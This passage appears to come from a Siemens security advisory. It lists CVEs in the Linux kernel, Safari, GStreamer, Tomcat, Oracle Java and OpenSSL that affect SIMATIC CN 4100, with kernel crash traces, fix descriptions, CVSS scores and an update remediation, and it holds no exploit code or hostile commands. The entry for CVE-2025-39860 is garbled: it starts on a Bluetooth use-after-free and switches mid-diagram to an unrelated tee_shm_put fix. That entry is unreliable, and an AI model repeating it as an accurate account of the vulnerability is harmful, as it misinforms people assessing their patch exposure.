     devm_memremap_pages+0x1e/0x60
     dev_dax_probe+0xce/0x2ec [device_dax]
     dax_bus_probe+0x6d/0xc9
     [... snip ...]

It turns out that the kernel panics while initializing vmemmap (struct page array) when the vmemmap region spans two PGD entries, because the new PGD entry is only installed in init_mm.pgd, but not in the page tables of other tasks.

And looking at __populate_section_memmap():

    if (vmemmap_can_optimize(altmap, pgmap))
        // does not sync top level page tables
        r = vmemmap_populate_compound_pages(pfn, start, end, nid, pgmap);
    else
        // sync top level page tables in x86
        r = vmemmap_populate(start, end, nid, altmap);

In the normal path, vmemmap_populate() in arch/x86/mm/init_64.c synchronizes the top level page table (See commit 9b861528a801 ("x86-64, mem: Update all PGDs for direct mapping and vmemmap mapping changes")) so that all tasks in the system can see the new vmemmap area.
However, when vmemmap_can_optimize() returns true, the optimized path skips synchronization of top-level page tables. This is because vmemmap_populate_compound_pages() is implemented in core MM code, which does not handle synchronization of the top-level page tables. Instead, the core MM has historically relied on each architecture to perform this synchronization manually.

We're not the first party to encounter a crash caused by not-sync'd top level page tables: earlier this year, Gwan-gyeong Mun attempted to address the issue [1] [2] after hitting a kernel panic when x86 code accessed the vmemmap area before the corresponding top-level entries were synced. At that time, the issue was believed to be triggered only when struct page was enlarged for debugging purposes, and the patch did not get further updates.

It turns out that current approach of relying on each arch to handle the page table sync manually is fragile because 1) it's easy to forget to sync the top level page table, and 2) it's also easy to overlook that the kernel should not access the vmemmap and direct mapping areas before the sync.

# The solution: Make page table sync more code robust and harder to miss

To address this, Dave Hansen suggested [3] [4] introducing {pgd,p4d}_populate_kernel() for updating kernel portion of the page tables and allow each architecture to explicitly perform synchronization when installing top-level entries. With this approach, we no longer need to worry about missing the sync step, reducing the risk of future regressions.

The new interface reuses existing ARCH_PAGE_TABLE_SYNC_MASK, PGTBL_P*D_MODIFIED and arch_sync_kernel_mappings() facility used by vmalloc and ioremap to synchronize page tables.
pgd_populate_kernel() looks like this:

    static inline void pgd_populate_kernel(unsigned long addr, pgd_t *pgd,
                                           p4d_t *p4d)
    {
        pgd_populate(&init_mm, pgd, p4d);
        if (ARCH_PAGE_TABLE_SYNC_MASK & PGTBL_PGD_MODIFIED)
            arch_sync_kernel_mappings(addr, addr);
    }

It is worth noting that vmalloc() and apply_to_range() carefully synchronizes page tables by calling p*d_alloc_track() and arch_sync_kernel_mappings(), and thus they are not affected by ---truncated---

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39845
In the Linux kernel, the following vulnerability has been resolved:

x86/mm/64: define ARCH_PAGE_TABLE_SYNC_MASK and arch_sync_kernel_mappings()

Define ARCH_PAGE_TABLE_SYNC_MASK and arch_sync_kernel_mappings() to ensure page tables are properly synchronized when calling p*d_populate_kernel().

For 5-level paging, synchronization is performed via pgd_populate_kernel(). In 4-level paging, pgd_populate() is a no-op, so synchronization is instead performed at the P4D level via p4d_populate_kernel().

This fixes intermittent boot failures on systems using 4-level paging and a large amount of persistent memory:

    BUG: unable to handle page fault for address: ffffe70000000034
    #PF: supervisor write access in kernel mode
    #PF: error_code(0x0002) - not-present page
    PGD 0 P4D 0
    Oops: 0002 [#1] SMP NOPTI
    RIP: 0010:__init_single_page+0x9/0x6d
    Call Trace:
     __init_zone_device_page+0x17/0x5d
     memmap_init_zone_device+0x154/0x1bb
     pagemap_range+0x2e0/0x40f
     memremap_pages+0x10b/0x2f0
     devm_memremap_pages+0x1e/0x60
     dev_dax_probe+0xce/0x2ec [device_dax]
     dax_bus_probe+0x6d/0xc9
     [... snip ...]
It also fixes a crash in vmemmap_set_pmd() caused by accessing vmemmap before sync_global_pgds() [1]:

    BUG: unable to handle page fault for address: ffffeb3ff1200000
    #PF: supervisor write access in kernel mode
    #PF: error_code(0x0002) - not-present page
    PGD 0 P4D 0
    Oops: Oops: 0002 [#1] PREEMPT SMP NOPTI
    Tainted: [W]=WARN
    RIP: 0010:vmemmap_set_pmd+0xff/0x230
     vmemmap_populate_hugepages+0x176/0x180
     vmemmap_populate+0x34/0x80
     __populate_section_memmap+0x41/0x90
     sparse_add_section+0x121/0x3e0
     __add_pages+0xba/0x150
     add_pages+0x1d/0x70
     memremap_pages+0x3dc/0x810
     devm_memremap_pages+0x1c/0x60
     xe_devm_add+0x8b/0x100 [xe]
     xe_tile_init_noalloc+0x6a/0x70 [xe]
     xe_device_probe+0x48c/0x740 [xe]
     [... snip ...]

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39846
In the Linux kernel, the following vulnerability has been resolved:

pcmcia: Fix a NULL pointer dereference in __iodyn_find_io_region()

In __iodyn_find_io_region(), pcmcia_make_resource() is assigned to res and used in pci_bus_alloc_resource(). There is a dereference of res in pci_bus_alloc_resource(), which could lead to a NULL pointer dereference on failure of pcmcia_make_resource().

Fix this bug by adding a check of res.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39847
In the Linux kernel, the following vulnerability has been resolved:

ppp: fix memory leak in pad_compress_skb

If alloc_skb() fails in pad_compress_skb(), it returns NULL without releasing the old skb. The caller does:

    skb = pad_compress_skb(ppp, skb);
    if (!skb)
        goto drop;

    drop:
        kfree_skb(skb);

When pad_compress_skb() returns NULL, the reference to the old skb is lost and kfree_skb(skb) ends up doing nothing, leading to a memory leak.

Align pad_compress_skb() semantics with realloc(): only free the old skb if allocation and compression succeed. At the call site, use the new_skb variable so the original skb is not lost when pad_compress_skb() fails.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-772 Missing Release of Resource after Effective Lifetime
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39848
In the Linux kernel, the following vulnerability has been resolved:

ax25: properly unshare skbs in ax25_kiss_rcv()

Bernard Pidoux reported a regression apparently caused by commit c353e8983e0d ("net: introduce per netns packet chains").

skb->dev becomes NULL and we crash in __netif_receive_skb_core().

Before above commit, different kind of bugs or corruptions could happen without a major crash.
But the root cause is that ax25_kiss_rcv() can queue/mangle input skb without checking if this skb is shared or not.

Many thanks to Bernard Pidoux for his help, diagnosis and tests.

We had a similar issue years ago fixed with commit 7aaed57c5c28 ("phonet: properly unshare skbs in phonet_rcv()").

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39849
In the Linux kernel, the following vulnerability has been resolved:

wifi: cfg80211: sme: cap SSID length in __cfg80211_connect_result()

If the ssid->datalen is more than IEEE80211_MAX_SSID_LEN (32) it would lead to memory corruption so add some bounds checking.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39853
In the Linux kernel, the following vulnerability has been resolved:

i40e: Fix potential invalid access when MAC list is empty

list_first_entry() never returns NULL - if the list is empty, it still returns a pointer to an invalid object, leading to potential invalid memory access when dereferenced.

Fix this by using list_first_entry_or_null instead of list_first_entry.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39857
In the Linux kernel, the following vulnerability has been resolved:

net/smc: fix one NULL pointer dereference in smc_ib_is_sg_need_sync()

    BUG: kernel NULL pointer dereference, address: 00000000000002ec
    PGD 0 P4D 0
    Oops: Oops: 0000 [#1] SMP PTI
    CPU: 28 UID: 0 PID: 343 Comm: kworker/28:1 Kdump: loaded Tainted: G OE 6.17.0-rc2+ #9 NONE
    Tainted: [O]=OOT_MODULE, [E]=UNSIGNED_MODULE
    Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.15.0-1 04/01/2014
    Workqueue: smc_hs_wq smc_listen_work [smc]
    RIP: 0010:smc_ib_is_sg_need_sync+0x9e/0xd0 [smc]
    ...
    Call Trace:
     smcr_buf_map_link+0x211/0x2a0 [smc]
     __smc_buf_create+0x522/0x970 [smc]
     smc_buf_create+0x3a/0x110 [smc]
     smc_find_rdma_v2_device_serv+0x18f/0x240 [smc]
     ? smc_vlan_by_tcpsk+0x7e/0xe0 [smc]
     smc_listen_find_device+0x1dd/0x2b0 [smc]
     smc_listen_work+0x30f/0x580 [smc]
     process_one_work+0x18c/0x340
     worker_thread+0x242/0x360
     kthread+0xe7/0x220
     ret_from_fork+0x13a/0x160
     ret_from_fork_asm+0x1a/0x30

If the software RoCE device is used, ibdev->dma_device is a null pointer. As a result, the problem occurs. Null pointer detection is added to prevent problems.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39860
In the Linux kernel, the following vulnerability has been resolved:

Bluetooth: Fix use-after-free in l2cap_sock_cleanup_listen()

syzbot reported the splat below without a repro.

In the splat, a single thread calling bt_accept_dequeue() freed sk and touched it after that.

The root cause would be the racy l2cap_sock_cleanup_listen() call added by the cited commit.

bt_accept_dequeue() is called under lock_sock() except for l2cap_sock_release().

Two threads could see the same socket during the list iteration in bt_accept_dequeue():

    CPU1                        CPU2 (close())
    ----                        ----
    sock_hold(sk)               sock_hold(sk);
    lock_sock(sk)

    shm = reg_pair_to_ptr(...);//shm maybe return NULL
    tee_shm_free(shm); --> tee_shm_put(shm);//crash

Add check in tee_shm_put to fix it.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39866
In the Linux kernel, the following vulnerability has been resolved:

fs: writeback: fix use-after-free in __mark_inode_dirty()

An use-after-free issue occurred when __mark_inode_dirty() get the bdi_writeback that was in the progress of switching.

    CPU: 1 PID: 562 Comm: systemd-random- Not tainted 6.6.56-gb4403bd46a8e #1
    ......
    pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
    pc : __mark_inode_dirty+0x124/0x418
    lr : __mark_inode_dirty+0x118/0x418
    sp : ffffffc08c9dbbc0
    ........
    Call trace:
     __mark_inode_dirty+0x124/0x418
     generic_update_time+0x4c/0x60
     file_modified+0xcc/0xd0
     ext4_buffered_write_iter+0x58/0x124
     ext4_file_write_iter+0x54/0x704
     vfs_write+0x1c0/0x308
     ksys_write+0x74/0x10c
     __arm64_sys_write+0x1c/0x28
     invoke_syscall+0x48/0x114
     el0_svc_common.constprop.0+0xc0/0xe0
     do_el0_svc+0x1c/0x28
     el0_svc+0x40/0xe4
     el0t_64_sync_handler+0x120/0x12c
     el0t_64_sync+0x194/0x198

Root cause is:

    systemd-random-seed                     kworker
    ----------------------------------------------------------------------
    ___mark_inode_dirty                     inode_switch_wbs_work_fn

      spin_lock(&inode->i_lock);
      inode_attach_wb
      locked_inode_to_wb_and_lock_list
         get inode->i_wb
         spin_unlock(&inode->i_lock);
         spin_lock(&wb->list_lock)
      spin_lock(&inode->i_lock)
      inode_io_list_move_locked
      spin_unlock(&wb->list_lock)
      spin_unlock(&inode->i_lock)
                                            spin_lock(&old_wb->list_lock)
                                              inode_do_switch_wbs
                                                spin_lock(&inode->i_lock)
                                                inode->i_wb = new_wb
                                                spin_unlock(&inode->i_lock)
                                            spin_unlock(&old_wb->list_lock)
                                            wb_put_many(old_wb, nr_switched)
                                              cgwb_release
                                              old wb released
      wb_wakeup_delayed() accesses wb,
      then trigger the use-after-free
      issue

Fix this race condition by holding inode spinlock until wb_wakeup_delayed() finished.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-416 Use After Free
Metrics: CVSS Version 3.1; Base Score 7.8; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-40300
In the Linux kernel, the following vulnerability has been resolved:

x86/vmscape: Add conditional IBPB mitigation

VMSCAPE is a vulnerability that exploits insufficient branch predictor isolation between a guest and a userspace hypervisor (like QEMU). Existing mitigations already protect kernel/KVM from a malicious guest.
Userspace can additionally be protected by flushing the branch predictors after a VMexit.

Since it is the userspace that consumes the poisoned branch predictors, conditionally issue an IBPB after a VMexit and before returning to userspace. Workloads that frequently switch between hypervisor and userspace will incur the most overhead from the new IBPB.

This new IBPB is not integrated with the existing IBPB sites. For instance, a task can use the existing speculation control prctl() to get an IBPB at context switch time. With this implementation, the IBPB is doubled up: one at context switch and another before running userspace.

The intent is to integrate and optimize these cases post-embargo.

[ dhansen: elaborate on suboptimal IBPB solution ]

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version (https://support.industry.siemens.com/cs/ww/en/view/109814144/)
Relevant CWE: CWE-402 Transmission of Private Resources into a New Sphere ('Resource Leak')
Metrics: CVSS Version 3.1; Base Score 6.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CVE-2025-43368
A use-after-free issue was addressed with improved memory management. This issue is fixed in Safari 26, iOS 26 and iPadOS 26, macOS Tahoe 26. Processing maliciously crafted web content may lead to an unexpected Safari crash.
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-416 Use After Free
Metrics: CVSS Version 3.1; Base Score 4.3; Base Severity MEDIUM; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

CVE-2025-47219

In GStreamer through 1.26.1, the isomp4 plugin's qtdemux_parse_trak function may read past the end of a heap buffer while parsing an MP4 file, possibly leading to information disclosure.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS Version 3.1; Base Score 8.1; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2025-48989

Improper Resource Shutdown or Release vulnerability in Apache Tomcat made Tomcat vulnerable to the made you reset attack. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.9, from 10.1.0-M1 through 10.1.43 and from 9.0.0.M1 through 9.0.107. Older, EOL versions may also be affected. Users are recommended to upgrade to one of versions 11.0.10, 10.1.44 or 9.0.108 which fix the issue.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-404 Improper Resource Shutdown or Release
Metrics: CVSS Version 3.1; Base Score 7.5; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2025-53057

Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security).
Supported versions that are affected are Oracle Java SE: 8u461, 8u461-perf, 11.0.28, 17.0.16, 21.0.8, 25; Oracle GraalVM for JDK: 17.0.16 and 21.0.8; Oracle GraalVM Enterprise Edition: 21.3.15. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data.

Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security.

CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N).

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-284 Improper Access Control
Metrics: CVSS Version 3.1; Base Score 5.9; Base Severity MEDIUM; Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2025-53066

Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 8u461, 8u461-perf, 11.0.28, 17.0.16, 21.0.8, 25; Oracle GraalVM for JDK: 17.0.16 and 21.0.8; Oracle GraalVM Enterprise Edition: 21.3.15.
Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data.

Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security.

CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
Metrics: CVSS Version 3.1; Base Score 7.5; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2025-55752

Relative Path Traversal vulnerability in Apache Tomcat. The fix for bug 60013 introduced a regression where the rewritten URL was normalized before it was decoded. This introduced the possibility that, for rewrite rules that rewrite query parameters to the URL, an attacker could manipulate the request URI to bypass security constraints including the protection for /WEB-INF/ and /META-INF/. If PUT requests were also enabled then malicious files could be uploaded leading to remote code execution.
PUT requests are normally limited to trusted users and it is considered unlikely that PUT requests would be enabled in conjunction with a rewrite that manipulated the URI. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.0.M11 through 9.0.108. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.6 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-23 Relative Path Traversal
Metrics: CVSS Version 3.1; Base Score 7.5; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-55754

Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache Tomcat. Tomcat did not escape ANSI escape sequences in log messages. If Tomcat was running in a console on a Windows operating system, and the console supported ANSI escape sequences, it was possible for an attacker to use a specially crafted URL to inject ANSI escape sequences to manipulate the console and the clipboard and attempt to trick an administrator into running an attacker controlled command. While no attack vector was found, it may have been possible to mount this attack on other operating systems. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.40 through 9.0.108. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.60 through 8.5.100. Other, older, EOL versions may also be affected.
Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-150 Improper Neutralization of Escape, Meta, or Control Sequences
Metrics: CVSS Version 3.1; Base Score 9.6; Base Severity CRITICAL; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE-2025-61748

Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 21.0.8 and 25; Oracle GraalVM for JDK: 21.0.8; Oracle GraalVM Enterprise Edition: 21.3.15. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data.

Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security.

CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-284 Improper Access Control
Metrics: CVSS Version 3.1; Base Score 3.7; Base Severity LOW; Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

CVE-2025-61795

Improper Resource Shutdown or Release vulnerability in Apache Tomcat. If an error occurred (including exceeding limits) during the processing of a multipart upload, temporary copies of the uploaded parts written to disc were not cleaned up immediately but left for the garbage collection process to delete. Depending on JVM settings, application memory usage and application load, it was possible that space for the temporary copies of uploaded parts would be filled faster than GC cleared it, leading to a DoS. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.11, from 10.1.0-M1 through 10.1.46, from 9.0.0.M1 through 9.0.109. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.12 or later, 10.1.47 or later or 9.0.110 or later, which fix the issue.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-404 Improper Resource Shutdown or Release
Metrics: CVSS Version 3.1; Base Score 5.3; Base Severity MEDIUM; Vector String CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2026-2673

Issue summary: An OpenSSL TLS 1.3 server may fail to negotiate the expected preferred key exchange group when its key exchange group configuration includes the default by using the 'DEFAULT' keyword.
Impact summary: A less preferred key exchange may be used even when a more preferred group is supported by both client and server, if the group was not included among the client's initial predicted keyshares. This will sometimes be the case with the new hybrid post-quantum groups, if the client chooses to defer their use until specifically requested by the server.

If an OpenSSL TLS 1.3 server's configuration uses the 'DEFAULT' keyword to interpolate the built-in default group list into its own configuration, perhaps adding or removing specific elements, then an implementation defect causes the 'DEFAULT' list to lose its 'tuple' structure, and all server-supported groups were treated as a single sufficiently secure 'tuple', with the server not sending a Hello Retry Request (HRR) even when a group in a more preferred tuple was mutually supported.

As a result, the client and server might fail to negotiate a mutually supported post-quantum key agreement group, such as 'X25519MLKEM768', if the client's configuration results in only 'classical' groups (such as 'X25519') being the only ones in the client's initial keyshare prediction.

OpenSSL 3.5 and later support a new syntax for selecting the most preferred TLS 1.3 key agreement group on TLS servers. The old syntax had a single 'flat' list of groups, and treated all the supported groups as sufficiently secure. If any of the keyshares predicted by the client were supported by the server, the most preferred among these was selected, even if other groups supported by the client, but not included in the list of predicted keyshares, would have been more preferred, if included.

The new syntax partitions the groups into distinct 'tuples' of roughly equivalent security.
Within each tuple the most preferred group included among the client's predicted keyshares is chosen, but if the client supports a group from a more preferred tuple, but did not predict any corresponding keyshares, the server will ask the client to retry the ClientHello (by issuing a Hello Retry Request or HRR) with the most preferred mutually supported group.

The above works as expected when the server's configuration uses the built-in default group list, or explicitly defines its own list by directly defining the various desired groups and group 'tuples'.

No OpenSSL FIPS modules are affected by this issue, the code in question lies outside the FIPS boundary.

OpenSSL 3.6 and 3.5 are vulnerable to this issue. OpenSSL 3.6 users should upgrade to OpenSSL 3.6.2 once it is released. OpenSSL 3.5 users should upgrade to OpenSSL 3.5.6 once it is released. OpenSSL 3.4, 3.3, 3.0, 1.0.2 and 1.1.1 are not affected by this issue.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-757 Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')
Metrics: CVSS Version 3.1; Base Score 7.5; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2026-21925

Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: RMI). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition.
Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data.

Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security.

CVSS 3.1 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).

